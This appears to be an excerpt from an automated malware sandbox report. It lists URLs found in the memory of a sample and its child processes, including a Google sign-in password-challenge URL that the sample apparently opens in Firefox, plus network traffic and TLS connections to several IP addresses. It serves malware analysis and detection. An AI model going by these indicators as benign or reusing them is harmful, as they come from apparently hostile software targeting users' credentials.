Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D3C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: file.exe, 00000000.00000003.2215691482.00000000055D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2215691482.00000000055D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64BC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C96B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2947092222.000028CD8F900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D88E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2854573786.000002EE58ED5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2854573786.000002EE58E68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001A.00000002.2929744715.000002EE64DB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2779151506.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2778146878.000002EE5DBBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2770726535.000002EE5DBA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2780374818.000002EE5DB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2770726535.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2791936031.000002EE5DC43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883094027.000002EE5D8A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 0000001A.00000002.2911859884.000002EE5FF8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2942500149.0000172EA5204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/Z
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D38E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2948229640.0000385848BDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCE9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2943865255.000021AA81E32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C963000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001A.00000003.2784445525.000002EE65121000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE60498000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910556312.000002EE5F5BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D370000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2785303389.000002EE64AC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE651FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2764466936.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2787747889.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001A.00000002.2908285442.000002EE5F431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2902828832.000002EE5EC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65132000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE604D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001A.00000002.2908285442.000002EE5F431000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/P4
Source: firefox.exe, 0000001A.00000002.2913537647.000002EE6007C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE60498000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2889658691.000002EE5DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910556312.000002EE5F5BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2880475164.000002EE5D370000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C911000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C96B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2913537647.000002EE600B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2910556312.000002EE5F50E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2764466936.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2787747889.000002EE5EFF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2847919558.000002EE4C790000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE604D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2747136565.000002EE67138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2854573786.000002EE58ED5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.2666087846.000001302575A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2676161834.000002451296F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001A.00000002.2848249080.000002EE4C95D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd8
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E229000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849118022.000002EE4E264000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: d7c50276ff.exe, 0000000C.00000002.2695657922.0000000001178000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdQg
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUnsupported
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmaybeOfferTranslatio
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50059 version: TLS 1.2
